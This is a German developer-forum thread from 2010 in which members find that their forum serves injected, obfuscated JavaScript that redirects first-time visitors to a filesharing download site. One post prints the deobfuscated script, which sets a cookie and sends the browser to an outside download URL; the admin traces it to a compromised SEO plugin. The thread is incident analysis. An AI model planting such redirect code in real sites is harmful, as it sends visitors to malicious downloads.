AGB  ·  Datenschutz  ·  Impressum  







Anmelden
Nützliche Links
Registrieren
Thema durchsuchen
Ansicht
Themen-Optionen

Fehler in der DP? (FileStore73.com)

Ein Thema von Linor · begonnen am 4. Aug 2010 · letzter Beitrag vom 20. Jan 2011
Antwort Antwort
Namenloser

Registriert seit: 7. Jun 2006
Ort: Karlsruhe
3.724 Beiträge
 
FreePascal / Lazarus
 
#1

AW: Fehler in der DP? (FileStore73.com)

  Alt 4. Aug 2010, 15:14
Also ich kann den Fehler nicht nachvollziehen.
  Mit Zitat antworten Zitat
Benutzerbild von Valle
Valle

Registriert seit: 26. Dez 2005
Ort: Karlsruhe
1.223 Beiträge
 
#2

AW: Fehler in der DP? (FileStore73.com)

  Alt 4. Aug 2010, 15:22
*räusper* Oh oh ... o.O

Wenn man die DP über Google das erste Mal (keine Cookies) öffnet, dann erhält man folgende Antwort von DP-Server: klick me. Ich habe mir das noch nicht genauer angeschaut, aber so auf den ersten Blick sieht das nicht gut aus, oder?

Edit #1: Dieser Code ist nach erster Erkenntnis mit Sicherheit für die Weiterleitung verantwortlich.

Liebe Grüße,
Valle
Valentin Voigt
BOFH excuse #423: „It's not RFC-822 compliant.“
Mein total langweiliger Blog

Geändert von Valle ( 4. Aug 2010 um 15:26 Uhr)
  Mit Zitat antworten Zitat
Benutzerbild von leddl
leddl

Registriert seit: 13. Okt 2003
Ort: Künzelsau
1.613 Beiträge
 
Delphi 2006 Professional
 
#3

AW: Fehler in der DP? (FileStore73.com)

  Alt 4. Aug 2010, 15:26
Das lässt sich selbst mit dem IE6 nachvollziehen
Axel Sefranek
A programmer started to cuss, cause getting to sleep was a fuss.
As he lay there in bed, looping round in his head
was: while(!asleep()) ++sheep;
  Mit Zitat antworten Zitat
Benutzerbild von Bernhard Geyer
Bernhard Geyer

Registriert seit: 13. Aug 2002
17.228 Beiträge
 
Delphi 10.4 Sydney
 
#4

AW: Fehler in der DP? (FileStore73.com)

  Alt 4. Aug 2010, 15:29
*räusper* Oh oh ... o.O

Wenn man die DP über Google das erste Mal (keine Cookies) öffnet, dann erhält man folgende Antwort von DP-Server: klick me. Ich habe mir das noch nicht genauer angeschaut, aber so auf den ersten Blick sieht das nicht gut aus, oder?
Schaut danach aus als hätte sich die DP etwas eingefangen. Ich denke da sollte man den Doktor mit Antibiotika ranlassen ...
Windows Vista - Eine neue Erfahrung in Fehlern.
  Mit Zitat antworten Zitat
mkinzler
(Moderator)

Registriert seit: 9. Dez 2005
Ort: Heilbronn
39.879 Beiträge
 
Delphi 11 Alexandria
 
#5

AW: Fehler in der DP? (FileStore73.com)

  Alt 4. Aug 2010, 15:33
Also bei mir kommt die gewünschte Seite
Es liegt wohl eher an Google
Markus Kinzler
  Mit Zitat antworten Zitat
Benutzerbild von Valle
Valle

Registriert seit: 26. Dez 2005
Ort: Karlsruhe
1.223 Beiträge
 
#6

AW: Fehler in der DP? (FileStore73.com)

  Alt 4. Aug 2010, 15:35
@mkinzler: Es liegt nicht an Google. Sicher nicht. Hast du NoScript?

Also wenn man das Javascript mal dekodiert - was ich mal getan habe - dann erhält man folgendes:

HTML-Code:
   var _0x7a86 = ["getTime", "setTime", "; expires=", "toGMTString", "cookie", "=", "; path=/", "vbsp", "1", "location", "http://filestore73.com/download.php?id="];
   function ipbcc(_0xf1d9x2, _0xf1d9x3)
   {
      var _0xf1d9x4 = new Date;
      _0xf1d9x4[_0x7a86[1]](_0xf1d9x4[_0x7a86[0]]() + 86400000);
      var _0xf1d9x5 = _0x7a86[2] + _0xf1d9x4[_0x7a86[3]]();
      document[_0x7a86[4]] = _0xf1d9x2 + _0x7a86[5] + _0xf1d9x3 + _0xf1d9x5 + _0x7a86[6];
   }
   ipbcc(_0x7a86[7], _0x7a86[8]);
   document[_0x7a86[9]] = _0x7a86[10] + vbsp;
Edit: Okay, noch kurzes Kommentar dazu: Der Code ist eigentlich ganz einfach. Wenn man die Variablen einfach mal umbennen würde, dann wäre er sicher auch lesbarer. Er ändert einfach die URL auf diese mysteriöse Filesharing Seite. Der Code (der den Download angeben sollte?) wird dabei scheinbar vom Server dynamisch neu generiert. Jemand sollte bei Daniel Panik schieben.

Liebe Grüße,
Valle
Valentin Voigt
BOFH excuse #423: „It's not RFC-822 compliant.“
Mein total langweiliger Blog

Geändert von Valle ( 4. Aug 2010 um 15:38 Uhr)
  Mit Zitat antworten Zitat
Benutzerbild von Sherlock
Sherlock

Registriert seit: 10. Jan 2006
Ort: Offenbach
3.814 Beiträge
 
Delphi 12 Athens
 
#7

AW: Fehler in der DP? (FileStore73.com)

  Alt 4. Aug 2010, 15:41
Nicht gut...gar nicht gut. Aber Doktor D. macht das schon.

Für diejenigen, die sich nicht vorstellen können, was so garstig daran ist, hier mal ein nicht ganz so trockener Artikel zum Thema:
http://www.heise.de/security/artikel...t-1017983.html

Sherlock
Oliver
Geändert von Sherlock (Morgen um 16:78 Uhr) Grund: Weil ich es kann
  Mit Zitat antworten Zitat
Daniel
(Co-Admin)

Registriert seit: 30. Mai 2002
Ort: Hamburg
13.920 Beiträge
 
Delphi 10.4 Sydney
 
#8

AW: Fehler in der DP? (FileStore73.com)

  Alt 4. Aug 2010, 15:47
Jein. Panik wäre zuviel des Guten.

Das Problem ist bekannt und vBSEO (der Hersteller der SEO-Erweiterung für vBulletin) und InternetBrands (Hersteller von vBulletin) schieben sich gegenseitig den schwarzen Peter hin und her.


Der Code "versteckt" sich in einem Plugin von vBSEO und wenn man dort einen bestimmten Cache neu aufbaut, ist der Code auch erst mal weg. Toll ist das keinesfalls, dennoch ich das Eindringen offenbar auf genau diese eine Stelle beschränkt: Es gab bis heute keine anderen Vorkommen dieses Codes. Ich werde schauen, dass ich eine Script-Lösung entwickle, die den Schadcode erkennt und dann bei Bedarf löscht.
Daniel R. Wolf
mit Grüßen aus Hamburg
  Mit Zitat antworten Zitat
blackfin
(Gast)

n/a Beiträge
 
#9

AW: Fehler in der DP? (FileStore73.com)

  Alt 4. Aug 2010, 15:51
Jetzt mal eine doofe Frage, weil ich mich mit dem Zeug nicht so auskenne:
Konnte das gefährlich für den eigenen Rechner gewesen sein, wenn man einmal auf diese ominöse Seite gelinkt wurde?
  Mit Zitat antworten Zitat
Antwort Antwort


Forumregeln

Es ist dir nicht erlaubt, neue Themen zu verfassen.
Es ist dir nicht erlaubt, auf Beiträge zu antworten.
Es ist dir nicht erlaubt, Anhänge hochzuladen.
Es ist dir nicht erlaubt, deine Beiträge zu bearbeiten.

BB-Code ist an.
Smileys sind an.
[IMG] Code ist an.
HTML-Code ist aus.
Trackbacks are an
Pingbacks are an
Refbacks are aus

Gehe zu:

Impressum · AGB · Datenschutz · Nach oben
Alle Zeitangaben in WEZ +1. Es ist jetzt 22:51 Uhr.
Powered by vBulletin® Copyright ©2000 - 2025, Jelsoft Enterprises Ltd.
LinkBacks Enabled by vBSEO © 2011, Crawlability, Inc.
Delphi-PRAXiS (c) 2002 - 2023 by Daniel R. Wolf, 2024-2025 by Thomas Breitkreuz